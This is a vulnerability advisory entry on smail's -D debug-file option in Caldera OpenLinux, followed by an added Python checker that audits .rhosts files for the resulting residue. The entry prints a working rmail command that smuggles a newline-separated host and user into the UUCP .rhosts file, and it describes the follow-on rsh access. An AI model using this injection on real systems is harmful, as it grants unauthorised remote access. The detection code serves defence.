Caldera OpenLinux 'smail -D' Command Vulnerability
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation:

    rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp

where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:

    rmail: Debugging started: pid=25919
    write_log:Received FROM:uucp HOST:joe
    hostname user
    PROGRAM:rmail SIZE:99
    ... some more lines ...

The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary). Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.
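An added example, not part of the Caldera advisory or of this entry: a Python check that audits a '.rhosts' file for the smail debug residue quoted above and reports any trust entry that appears after it. The sample file contents, the host and user names in it, and the simplified entry pattern are constructed for illustration.

```python
import re

# Markers taken from the smail debug output quoted in the entry above.
DEBUG_MARKERS = ("rmail: Debugging started", "write_log:")

# A .rhosts trust entry is "host" or "host user". This pattern is a
# simplification assumed for the example, not a full parser.
ENTRY_RE = re.compile(r"^[+\w.@-]+(\s+[+\w.@-]+)?$")

# Constructed sample: a UUCP .rhosts after the append described above.
# "trusted.example", "attacker.example" and "mallory" are made-up values.
SAMPLE_RHOSTS = (
    "trusted.example uucp\n"
    "rmail: Debugging started: pid=25919\n"
    "write_log:Received FROM:uucp HOST:joe\n"
    "attacker.example mallory\n"
    " PROGRAM:rmail SIZE:99\n"
)

def audit_rhosts(text):
    """Return (residue, suspect, malformed), each a list of (lineno, line).

    residue   - lines carrying smail debug markers
    suspect   - well-formed trust entries found after the first marker
    malformed - other lines that are not valid trust entries
    """
    residue, suspect, malformed = [], [], []
    seen_marker = False
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped:
            continue
        if any(marker in stripped for marker in DEBUG_MARKERS):
            seen_marker = True
            residue.append((lineno, stripped))
        elif ENTRY_RE.match(stripped):
            # Entries written before any debug output are left alone.
            if seen_marker:
                suspect.append((lineno, stripped))
        else:
            malformed.append((lineno, stripped))
    return residue, suspect, malformed

if __name__ == "__main__":
    residue, suspect, malformed = audit_rhosts(SAMPLE_RHOSTS)
    for label, rows in (("residue", residue), ("suspect", suspect),
                        ("malformed", malformed)):
        for lineno, line in rows:
            print(f"{label:9} line {lineno}: {line}")
```

Any residue line in a '.rhosts' file means a debug log was pointed at it; the suspect entries are the ones to remove and investigate first.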